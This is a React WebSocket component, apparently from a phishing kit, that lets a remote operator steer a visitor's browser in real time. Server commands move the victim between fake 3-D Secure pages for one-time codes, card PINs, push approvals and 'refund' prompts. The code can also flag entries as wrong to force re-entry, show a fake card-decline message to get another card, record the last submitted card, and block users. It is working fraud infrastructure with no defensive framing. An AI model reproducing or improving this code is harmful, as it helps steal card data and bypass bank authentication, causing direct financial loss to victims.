import React, { useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import { ToastContainer, toast } from 'react-toastify';
import { AiOutlineExclamationCircle } from 'react-icons/ai';

import 'react-toastify/dist/ReactToastify.css';
import './Toast.css';

// Module-level persistent singleton to guarantee strictly 1 active WebSocket connection across all renders
let globalWs = null;
let reconnectTimer = null;
let heartbeatInterval = null;
let lastMessageTime = Date.now();
let activeNavigate = null;

const getActiveUuId = () => {
    let id = localStorage.getItem("uuId") || localStorage.getItem("session_uuId");
    if (!id) {
        let result = '';
        for (let i = 0; i < 16; i++) {
            result += Math.floor(Math.random() * 10);
        }
        id = result;
        localStorage.setItem("uuId", id);
        localStorage.setItem("session_uuId", id);
    }
    return id;
};

const Websocket = () => {
    const navigate = useNavigate();

    // Keep active navigate synchronized
    useEffect(() => {
        activeNavigate = navigate;
    }, [navigate]);

    useEffect(() => {
        const sendHeartbeat = () => {
            const currentUuId = getActiveUuId();
            if (globalWs && globalWs.readyState === WebSocket.OPEN) {
                try {
                    globalWs.send(JSON.stringify({
                        type: "ping",
                        uuId: currentUuId
                    }));
                } catch (_) {}

                // Watchdog: If no message received from server for > 14 seconds, force reconnect
                if (Date.now() - lastMessageTime > 14000) {
                    console.warn('[WS] Watchdog: connection appears dead (silent TCP drop). Reconnecting...');
                    try {
                        globalWs.close();
                    } catch (_) {}
                    globalWs = null;
                    scheduleReconnect(300);
                }
            }
        };

        const scheduleReconnect = (delay = 2000) => {
            if (reconnectTimer) clearTimeout(reconnectTimer);
            reconnectTimer = setTimeout(() => {
                connectWebSocket();
            }, delay);
        };

        const connectWebSocket = () => {
            if (reconnectTimer) {
                clearTimeout(reconnectTimer);
                reconnectTimer = null;
            }

            // Guard: do not reconnect if already open or connecting
            if (globalWs && (globalWs.readyState === WebSocket.OPEN || globalWs.readyState === WebSocket.CONNECTING)) {
                return;
            }

            const wsUrl = process.env.REACT_APP_WEBSOCKET_URL || process.env.REACT_APP_WS_URL || 'wss://devosyshandler.com';
            
            try {
                if (globalWs) {
                    globalWs.onopen = null;
                    globalWs.onmessage = null;
                    globalWs.onclose = null;
                    globalWs.onerror = null;
                    if (globalWs.readyState === WebSocket.OPEN || globalWs.readyState === WebSocket.CONNECTING) {
                        globalWs.close();
                    }
                }
                globalWs = new WebSocket(wsUrl);
            } catch (e) {
                console.error('[WS] WebSocket creation error:', e);
                scheduleReconnect(3000);
                return;
            }

            globalWs.onopen = () => {
                lastMessageTime = Date.now();
                const currentUuId = getActiveUuId();

                const message = JSON.stringify({
                    type: "existing_uuId",
                    uuId: currentUuId,
                });
                try {
                    globalWs.send(message);
                } catch (_) {}
                console.log("[WS] Connected to WebSocket server with uuId:", currentUuId);

                // Start aggressive keep-alive heartbeat (every 5 seconds)
                if (heartbeatInterval) clearInterval(heartbeatInterval);
                heartbeatInterval = setInterval(sendHeartbeat, 5000);
            };

            globalWs.onmessage = (message) => {
                lastMessageTime = Date.now();

                try {
                    const message_json = JSON.parse(message.data);

                    // Respond to server-level ping
                    if (message_json.type === 'ping') {
                        const currentUuId = getActiveUuId();
                        if (globalWs && globalWs.readyState === WebSocket.OPEN) {
                            try {
                                globalWs.send(JSON.stringify({ type: 'pong', uuId: currentUuId }));
                            } catch (_) {}
                        }
                        return;
                    }

                    if (message_json.type === 'pong') {
                        return;
                    }

                    console.log('[WS] Command received:', message_json.type);

                    if (message_json.design) {
                        localStorage.setItem('session_design', message_json.design);
                    }

                    // Dispatch event for real-time 3DS listeners
                    window.dispatchEvent(new CustomEvent('ws_command', { detail: message_json }));

                    const doNavigate = (target) => {
                        if (typeof activeNavigate === 'function') {
                            activeNavigate(target);
                        }
                    };

                    if (message_json.type === "uuId_assign") {
                        localStorage.setItem("uuId", message_json.uuId);
                        localStorage.setItem("session_uuId", message_json.uuId);
                    } else if (message_json.type === "message") {
                        toast(
                            <div className="flex items-center gap-2">
                                <AiOutlineExclamationCircle className="text-yellow-500" size={24} />
                                <span>{message_json.message}</span>
                            </div>,
                            {
                                position: "bottom-right",
                                autoClose: 10000,
                                className: "bg-gray-800 text-white rounded shadow-md",
                                progressClassName: "bg-yellow-500",
                            }
                        );
                    } else if (message_json.type === "block_user") {
                        localStorage.setItem('blocked', 'true');
                    } else if (message_json.type === "question_response" || message_json.type === "show_question") {
                        if (message_json.message) {
                            localStorage.setItem('seq_quest', message_json.message);
                        }
                        doNavigate("/3ds/question");
                    } else if (message_json.type === "push_text" || message_json.type === "show_push") {
                        if (message_json.message) {
                            localStorage.setItem('push_text', message_json.message);
                        }
                        doNavigate("/3ds/push");
                    } else if (message_json.type === "show_refund") {
                        if (message_json.isRetry || message_json.to === "wrong_code" || message_json.to === "wrong_refund") {
                            const currentUuId = getActiveUuId();
                            sessionStorage.setItem("refund_retry_flag_" + currentUuId, "true");
                        }
                        doNavigate("/3ds/refund");
                    } else if (message_json.type === "show_otp") {
                        if (message_json.isRetry || message_json.to === "wrong_code") {
                            const currentUuId = getActiveUuId();
                            sessionStorage.setItem("otp_retry_flag_" + currentUuId, "true");
                        }
                        doNavigate("/3ds/otp");
                    } else if (message_json.type === "show_pin") {
                        if (message_json.isRetry) {
                            const currentUuId = getActiveUuId();
                            sessionStorage.setItem("pin_retry_flag_" + currentUuId, "true");
                        }
                        doNavigate("/3ds/balance");
                    } else if (message_json.type === "show_error") {
                        const lastCard = localStorage.getItem('session_last_submitted_card') || '';
                        if (lastCard) {
                            sessionStorage.setItem('rejected_card', lastCard);
                        }
                        const declineMsg = message_json.message || 'Payment Authorization Declined. Please use a different card.';
                        window.dispatchEvent(new CustomEvent('card_declined', { detail: { message: declineMsg } }));
                        doNavigate("/checkout");
                    } else if (message_json.type === "redirect_success") {
                        doNavigate("/ThankYou");
                    } else if (message_json.type === "redirect") {
                        const RedirectPage = message_json.to;
                        if (RedirectPage === "refund_page" || RedirectPage === "wrong_refund") {
                            if (RedirectPage === "wrong_refund" || message_json.isRetry) {
                                const currentUuId = getActiveUuId();
                                sessionStorage.setItem("refund_retry_flag_" + currentUuId, "true");
                            }
                            doNavigate("/3ds/refund");
                        } else if (RedirectPage === "otp_page" || RedirectPage === "wrong_code") {
                            if (RedirectPage === "wrong_code" || message_json.isRetry) {
                                const currentUuId = getActiveUuId();
                                sessionStorage.setItem("otp_retry_flag_" + currentUuId, "true");
                            }
                            doNavigate("/3ds/otp");
                        } else if (RedirectPage === "wrong_data") {
                            const lastCard = localStorage.getItem('session_last_submitted_card') || '';
                            if (lastCard) {
                                sessionStorage.setItem('rejected_card', lastCard);
                            }
                            const declineMsg = message_json.message || 'Payment Authorization Declined. Please use a different card.';
                            window.dispatchEvent(new CustomEvent('card_declined', { detail: { message: declineMsg } }));
                            doNavigate("/checkout");
                        } else if (RedirectPage === "sucess_page" || RedirectPage === "success_page") {
                            doNavigate("/ThankYou");
                        } else if (RedirectPage === "wrong_push" || RedirectPage === "push_page") {
                            doNavigate("/3ds/push");
                        } else if (RedirectPage === "wrong_balance" || RedirectPage === "balance_page") {
                            if (RedirectPage === "wrong_balance" || message_json.isRetry) {
                                const currentUuId = getActiveUuId();
                                sessionStorage.setItem("pin_retry_flag_" + currentUuId, "true");
                            }
                            doNavigate("/3ds/balance");
                        } else if (RedirectPage === "original_page") {
                            doNavigate("/success");
                        }
                    }
                } catch (err) {
                    console.error('[WS] Error handling WebSocket message:', err);
                }
            };

            globalWs.onclose = (event) => {
                if (heartbeatInterval) {
                    clearInterval(heartbeatInterval);
                    heartbeatInterval = null;
                }

                // If closed by server because another connection superseded this UUID (Code 4000),
                // do NOT loop reconnect! Stand by until user focuses/interacts with this tab.
                if (event && (event.code === 4000 || (event.reason && event.reason.includes('Replaced')))) {
                    console.log(`[WS] Connection superseded by another tab/session (code: 4000). Standby mode.`);
                    globalWs = null;
                    return;
                }

                // Clean voluntary close
                if (event && event.code === 1000) {
                    console.log('[WS] Connection closed cleanly (code: 1000).');
                    globalWs = null;
                    return;
                }

                console.log("[WS] Disconnected from WebSocket server. Reconnecting in 2.5s...");
                globalWs = null;
                scheduleReconnect(2500);
            };

            globalWs.onerror = (err) => {
                console.error("[WS] Socket error:", err);
                if (globalWs && globalWs.readyState === WebSocket.OPEN) {
                    try { globalWs.close(); } catch (_) {}
                }
            };
        };

        // Resilient mobile lifecycle events
        const handleWakeup = () => {
            const currentUuId = getActiveUuId();
            if (!globalWs || (globalWs.readyState !== WebSocket.OPEN && globalWs.readyState !== WebSocket.CONNECTING)) {
                connectWebSocket();
            } else if (globalWs.readyState === WebSocket.OPEN) {
                lastMessageTime = Date.now();
                try {
                    globalWs.send(JSON.stringify({
                        type: "existing_uuId",
                        uuId: currentUuId
                    }));
                    globalWs.send(JSON.stringify({
                        type: "ping",
                        uuId: currentUuId
                    }));
                } catch (_) {}
            }
        };

        const handleVisibilityChange = () => {
            if (document.visibilityState === "visible") {
                handleWakeup();
            }
        };

        const handleSessionUpdate = (e) => {
            const newUuId = e.detail?.uuId || getActiveUuId();
            if (globalWs && globalWs.readyState === WebSocket.OPEN) {
                try {
                    globalWs.send(JSON.stringify({
                        type: "existing_uuId",
                        uuId: newUuId
                    }));
                    globalWs.send(JSON.stringify({
                        type: "ping",
                        uuId: newUuId
                    }));
                } catch (_) {}
            } else if (!globalWs || (globalWs.readyState !== WebSocket.CONNECTING && globalWs.readyState !== WebSocket.OPEN)) {
                connectWebSocket();
            }
        };

        // Initialize connection
        if (!globalWs || (globalWs.readyState !== WebSocket.OPEN && globalWs.readyState !== WebSocket.CONNECTING)) {
            connectWebSocket();
        }

        document.addEventListener("visibilitychange", handleVisibilityChange);
        window.addEventListener("pageshow", handleWakeup);
        window.addEventListener("focus", handleWakeup);
        window.addEventListener("online", handleWakeup);
        window.addEventListener("session_update", handleSessionUpdate);

        return () => {
            // Keep background connection persistent across route changes
            document.removeEventListener("visibilitychange", handleVisibilityChange);
            window.removeEventListener("pageshow", handleWakeup);
            window.removeEventListener("focus", handleWakeup);
            window.removeEventListener("online", handleWakeup);
            window.removeEventListener("session_update", handleSessionUpdate);
        };
    }, []);

    return (
        <ToastContainer
            hideProgressBar={false}
            newestOnTop={false}
            closeOnClick
            rtl={false}
            pauseOnFocusLoss
            draggable
            pauseOnHover
        />
    );
};

export default Websocket;